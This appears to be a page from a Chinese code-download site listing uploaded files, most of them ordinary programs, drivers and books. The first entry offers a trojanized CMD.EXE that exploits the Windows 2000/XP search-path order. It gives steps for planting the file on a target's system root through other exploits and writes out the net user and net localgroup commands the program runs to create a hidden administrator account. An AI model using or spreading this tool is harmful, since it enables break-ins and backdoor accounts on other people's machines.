你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
上传时间: 2015-01-12
上传用户:qlpqlq
vc下 usb程序USB端口的分析, VC-MFC 硬件-系统 VC,MFC基础类,非技术类,界面,网络编程,进程,线程,DLL,ATL,ActiveX,COM,数据库,硬件,系统,HTML,XML,图形处理,算法,
上传时间: 2013-11-30
上传用户:wang5829
KesionCMS V4.0集成了以往版本的所有优点,4.0的最大卓越之处在于不仅提供了自带的常用网站管理功 能模型(文章、图片、下载,动漫,影视,音乐、供求、商城)外,而且还提供了系统扩展框架,您可以 直接在后台通过新建表、自定义字段,然后组成新的系统模型,以实现各种适合用户自己的系统。如企 业招骋,房产系统、用户产品展库等等......同时,此功能也可将信息量分配于不同的信息表,为数据 量较大的网站进行数据的有效部署。 下载地址:http://www.kesion.com/Down/Kesion/761533187518610.html 演示地址:http://www.kesion.cn
上传时间: 2013-12-15
上传用户:363186
linux2.6.24 S3C2410下的网卡CS8900驱动 具体移植方法可以参考我的blog http://www.cublog.cn/u2/63560/showart_514147.html
标签: S3C2410 showart 514147 cublog
上传时间: 2014-01-06
上传用户:1051290259
C陷阱与缺陷的中文和英文版,http://www.pudn.com/downloads9/ebook/detail35740.html李李的上载是有加密的,这个没有,解压即可
上传时间: 2013-12-09
上传用户:330402686
Decim流密码VHDL源程序 http://www.ecrypt.eu.org/stream/decimp3.html
标签: ecrypt decimp stream Decim
上传时间: 2013-12-14
上传用户:refent
MeyboMail Web(脉博邮件系统客户端)是一个纯Java编写的,基于B/S模式的邮件系统客户端软件,系统表示层使用easyjf.com(简易java框架)的 EasyJWeb框架开发,主要通过调用java mail实现邮件的收发。MeyboMail Web主要配合MeyboMail Server(脉博邮件服务器系统)使用,MeyboMail Server是使用Java编写,可以运行在任何支持Java的服务器系统平台。拥有自主知识产权的邮件服务器系统软件,系统实现了POP3,ESMTP 等邮件协议,支持服务器群集,可以运行在多台服务器上。
标签: MeyboMail EasyJWeb easyjf Java
上传时间: 2014-11-14
上传用户:qq21508895
C++Primer中文版 第三版 深入系列 Primer 第三版 著 中中文文版版潘爱民张丽译 Addison-Wesley 中国电力出版社 www.infopower.com.cn Stanley B Lippman J o s é e L a j o i e
标签: Primer Addison-Wesley infopower www
上传时间: 2014-01-14
上传用户:myworkpost
B/S权限控制的例子
标签: 权限控制
上传时间: 2014-01-11
上传用户:yoleeson
图像检索的代码b
上传时间: 2015-02-04
上传用户:奇奇奔奔